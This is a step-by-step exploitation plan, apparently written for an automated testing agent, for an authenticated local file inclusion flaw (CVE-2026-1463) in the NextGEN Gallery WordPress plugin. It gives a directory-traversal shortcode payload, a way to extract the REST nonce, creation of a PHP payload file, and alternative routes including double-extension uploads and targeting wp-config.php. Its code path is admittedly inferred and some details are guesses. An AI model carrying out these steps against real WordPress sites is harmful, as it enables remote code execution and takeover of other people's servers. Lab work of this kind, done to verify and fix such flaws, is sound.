Research Plan: CVE-2026-1463 NextGEN Gallery Local File Inclusion

1. Vulnerability Summary

The Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery plugin (<= 4.0.4) is vulnerable to Authenticated (Author+) Local File Inclusion (LFI). The vulnerability exists in the handling of the template parameter within the NextGEN Gallery (ngg) shortcode. The plugin fails to adequately sanitize this parameter for directory traversal sequences (e.g., ../) or validate that the requested template file resides within the intended directory. This allows an attacker with post-creation capabilities (Author role and above) to include and execute arbitrary .php files present on the server.

2. Attack Vector Analysis

• Endpoint: The vulnerability is triggered during the rendering of a WordPress post or page containing a NextGEN Gallery shortcode.
• Target Parameter: The template attribute within the [ngg ...] shortcode.
• Vulnerable Action: Post rendering/Shortcode expansion.
• Authentication Level: Author or higher. Authors have the edit_posts and publish_posts capabilities required to create and view their own posts.
• Preconditions:
  1. The attacker must have credentials for an account with at least the Author role.
  2. The NextGEN Gallery plugin must be active.
  3. The attacker must be able to upload a file that can be interpreted as PHP (e.g., a .php file or a file with a double extension/image headers) to use the LFI for Remote Code Execution (RCE).

3. Code Flow (Inferred)

Note: The provided source files cover the React/Build environment. The following flow is based on the NextGEN Gallery core architecture.

1. Shortcode Registration: NextGEN registers the [ngg] shortcode (likely via add_shortcode('ngg', ...)).
2. Shortcode Processing: When a post is viewed, NGG_Shortcodes::render_template() or a similar handler is invoked.
3. Template Resolution: The handler extracts the template attribute from the $atts array.
4. Vulnerable Path Construction: The plugin identifies the template file path. A common pattern in NextGEN is:
   $template_path = $this->get_template_directory() . DIRECTORY_SEPARATOR . $atts['template'] . '.php';
5. Execution: The resolved path is passed to a PHP include statement:
   include($template_path);
6. LFI: If $atts['template'] contains ../../../../wp-config, the resulting path becomes /plugin/dir/templates/../../../../wp-config.php, bypassing intended directory restrictions.

4. Nonce Acquisition Strategy

The rendering of the shortcode (which triggers the LFI) occurs on the frontend and does not require a nonce.

However, creating the post containing the shortcode via the WordPress REST API or Admin UI requires a REST nonce (X-WP-Nonce) or an Admin nonce (_wpnonce).

Strategy:

1. Login: Authenticate as an Author via the http_request tool.
2. Identify Nonce: Navigate to the "Add New Post" page.
3. Extract: Use browser_eval to extract the REST nonce from the WordPress settings object.
   • JavaScript: window.wpApiSettings.nonce
4. Action: Use this nonce to create a post via the REST API (/wp-json/wp/v2/posts).

5. Exploitation Strategy

The goal is to demonstrate RCE by uploading a malicious PHP file as an Author and including it via the shortcode.

Step 1: Create a Malicious File

Since Authors can upload media, we will upload a file containing PHP code.

1. Use wp_cli to find the uploads directory path: wp eval "echo wp_upload_dir()['path'];"
2. Create a file poc.php in that directory: echo "<?php echo 'VULNERABLE_LFI_REACHED'; phpinfo(); ?>" > /var/www/html/wp-content/uploads/poc.php.

Step 2: Authenticate and Obtain Nonce

1. Login as Author.
2. Navigate to wp-admin/post-new.php.
3. Execute browser_eval("wpApiSettings.nonce") to get the REST nonce.

Step 3: Create Post with Malicious Shortcode

Use the http_request tool to create a post via the REST API.

• Method: POST
• URL: /wp-json/wp/v2/posts
• Headers:
  • Content-Type: application/json
  • X-WP-Nonce: [EXTRACTED_NONCE]
• Body:

  {
    "title": "LFI Test",
    "content": "[ngg src=\"galleries\" ids=\"1\" display_type=\"photocrati-nextgen_basic_thumbnails\" template=\"../../../../uploads/poc\"]",
    "status": "publish"
  }
  

  (Note: We assume NextGEN appends .php. If not, use template=\"../../../../uploads/poc.php\").

Step 4: Trigger the LFI

1. Get the URL of the newly created post from the REST API response (parameter link).
2. Use the http_request tool to perform a GET request to that URL.

6. Test Data Setup

1. User Creation: wp user create attacker author@example.com --role=author --user_pass=password123
2. Gallery Creation: NextGEN might require at least one gallery to exist for the shortcode to process.
   • wp eval "nggdb::add_gallery('Test Gallery', '/tmp', 0, 0, 0);" (Verify exact NextGEN CLI or method).
3. Payload File: Create /var/www/html/wp-content/uploads/poc.php with the content <?php echo 'VULNERABLE_LFI_REACHED'; ?>.

7. Expected Results

• The GET request to the post URL should return an HTTP 200 status.
• The response body must contain the string VULNERABLE_LFI_REACHED.
• If phpinfo() was included, the response will contain the PHP configuration table.

8. Verification Steps

1. Manual Check: Use http_request to view the post and check for the payload output.
2. CLI Check: Use wp post list to verify the post was created with the correct shortcode.
3. Path Verification: If the include fails, check the error_log (if WP_DEBUG is on) to see the exact path NextGEN attempted to include, then adjust the number of ../ sequences in the payload.

9. Alternative Approaches

• Direct Parameter Injection: If NextGEN provides a preview or AJAX function that renders galleries before saving, target that endpoint (likely admin-ajax.php with action ngg_render_template).
• Double Extension: If the plugin validates extensions, try naming the file poc.php.jpg or poc.jpg (if the server is misconfigured to execute PHP in images) and include it.
• Standard WordPress Files: If RCE via upload is restricted, target wp-config.php. While it won't display the DB password in the HTML, it may trigger database connection errors or different behaviors that confirm the file was included. A better target for confirmation is license.txt if the plugin doesn't append .php, or any existing PHP file that produces unique output.